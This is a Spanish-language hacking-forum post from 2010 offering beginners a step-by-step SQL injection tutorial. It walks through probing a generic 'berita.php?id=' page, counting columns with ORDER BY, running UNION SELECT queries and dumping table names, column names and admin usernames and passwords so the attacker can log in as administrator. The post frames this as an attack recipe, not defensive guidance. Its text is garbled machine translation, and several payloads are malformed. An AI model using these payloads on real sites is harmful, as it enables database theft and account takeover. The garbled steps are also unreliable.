Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

SQLI tutorial pour débutants ( newbie) ecrite par *..::Key-m0rt::..*

  • 0 Respuestas
  • 2434 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ..::key-m0rt::..

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • MaEsTRO DeL arTE dE hAblARmE cOn Lo quE DesCRIBO
    • Ver Perfil
« en: Marzo 23, 2010, 12:38:21 pm »
                    ***************************************************************
                   *  SQLI tutorial pour débutants ecrite par *..::Key-m0rt::..*     *         
                   ****************************************************************

bueno aqui les traigo un pequeño tutorial de sqli  para newbies ( principiantes ) espero que les guste no olvien agradecer , es gratis :P

===========
= Primer  paso: =
===========

Buscar destino
Por ejemplo: [sitio] / berita.php? id = 100

Añadir los personajes al final de la URL, o agregar el carácter "-" (sin las ") para ver si hay un mensaje de error.
ejemplo:

[sitio] / berita.php? id = 100 'o
[sitio] / berita.php? id =- 100

==========
= El segundo paso: =
==========

encontrar y contar el número de tablas disponibles en la base de datos ...
use el comando: Ordenar por:

ejemplo:
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + para + por +1- - o
[sitio] / berita.php? ID 100 =- + para + de 1 / *

 paso a paso (satupersatu) ...
ejemplo:
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + para + de +1- --
[sitio] / berita.php? ID 100 =- + para + por +2- --
[sitio] / berita.php? ID 100 =- + para + por +3- --
[sitio] / berita.php? ID 100 =- + para + por +4- --

por lo tanto, el error o mensaje de error de ...
Por ejemplo: [sitio] / berita.php? ID 100 =- + para + por +9- --

significa que tomamos es hasta el número 8
se convierte en [sitio] / berita.php? ID 100 =- + para + por +8- --


===========
= El tercer paso: =
===========

para averiguar cómo utilizar la Unión parece
debido a este error hasta el número 9
a continuación: [sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4,5,6,7,8 seleccione --

ok escribió los números es como el 5

utilizar la versión () o @ @ version para comprobar la versión de diapakai entrada de comandos SQL escribió sobre TSB nagka escribió el último en salir
Por ejemplo: [sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, version (), 6,7,8 - o
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, @ @ version, 6,7,8 --

Ver la versión utilizada es como YG 4 versiones dejan ver porque en este 4 que teníamos que adivinar su propia columna de la tabla n imaginable en la red porque no pueden usar el comando + De INFORMATION_SCHEMA ..

de la versión 5 significa que tienen la suerte de no tener que adivinar la columna de la tabla n Ver Ver como 4 porque el 5 era capaz de utilizar el comando de + INFORMATION_SCHEMA ..


===========
= cuarto paso : =
===========

para mostrar todo el contenido de la tabla que se está
GROUP_CONCAT comando (TABLE_NAME)>>> incluido en las cifras a la última respuesta
Comando + de + INFORMATION_SCHEMA.TABLES + + = donde table_schema base de datos ()>>> inserta a continuación del último número de

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, GROUP_CONCAT (TABLE_NAME), 6,7,8 + de + en + + INFORMATION_SCHEMA.TABLES TABLE_SCHEMA = base de datos () -- --

=============
= quinto paso : =
=============

GROUP_CONCAT comando (column_name)>>> incluido en las cifras a la última respuesta
Comando + de + + + donde INFORMATION_SCHEMA.COLUMNS table_name = 0xhexa ->>> inserta a continuación del último número de

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, GROUP_CONCAT (column_name), 6,7,8 + de + + + donde INFORMATION_SCHEMA.COLUMNS table_name = 0xhexa --

en esta etapa debe mengextrak palabra sobre el contenido de la tabla para convertir hexadecimal de esta manera
YG sitio web se utiliza para la conversión:

http://palembang.bforum.biz/ascii-h4.htm

ejemplo de palabras de compasión en la conversión de la administración se 61646D696E

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, GROUP_CONCAT (column_name), 6,7,8 + de + + + donde INFORMATION_SCHEMA.COLUMNS table_name = 0x61646D696E --

============
= Sexto Paso : =
============

ayer dio lugar a lo que ha sido excluido de la tabla que es la forma

CONCAT_WS comando (0x3a, la columna de contenidos respuesta emitida)>>> incluido en las cifras a la última respuesta
Comando + de + (nombre derivado de la mesa)>>> inserta a continuación del último número de

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + Seleccionar +1,2,3,4, CONCAT_WS (0x3a, el contenido de la columna), 6,7,8 + de + (nombre de la tabla derivados) --

ejemplos de palabras que salió fue el de identificación, nombre de usuario, contraseña

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + Seleccionar +1,2,3,4, CONCAT_WS (0x3a, id, nombre de usuario, contraseña), 6,7,8 + de + admin --

==============
= Septimo paso : =
==============

etapa final para admin patio o inicio de sesión.

un saludo , agradezcan c'est gratuit   *..:: key-m0rt::..*
           

 

¿Te gustó el post? COMPARTILO!



Explotación del Heap a través de la macro UNLINK (TUTORIAL)

Iniciado por l3x4

Respuestas: 4
Vistas: 5010
Último mensaje Agosto 06, 2018, 05:52:45 pm
por KiddArabic
Tutorial de un exploit local BOF con bypass DEP usando ROP by PerverthsO

Iniciado por PerverthsO

Respuestas: 0
Vistas: 2336
Último mensaje Marzo 04, 2013, 01:40:08 pm
por PerverthsO
[Tutorial] Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits]

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2566
Último mensaje Febrero 24, 2010, 03:24:51 pm
por dracko.rx
[Video-Tutorial] SQL Injection + Subir shell

Iniciado por Xt3mP

Respuestas: 0
Vistas: 2242
Último mensaje Julio 21, 2010, 07:48:08 pm
por Xt3mP
Full Source Disclosure [Tutorial Basico]

Iniciado por Pr0ph3t

Respuestas: 1
Vistas: 3262
Último mensaje Mayo 08, 2012, 05:49:49 pm
por baron.power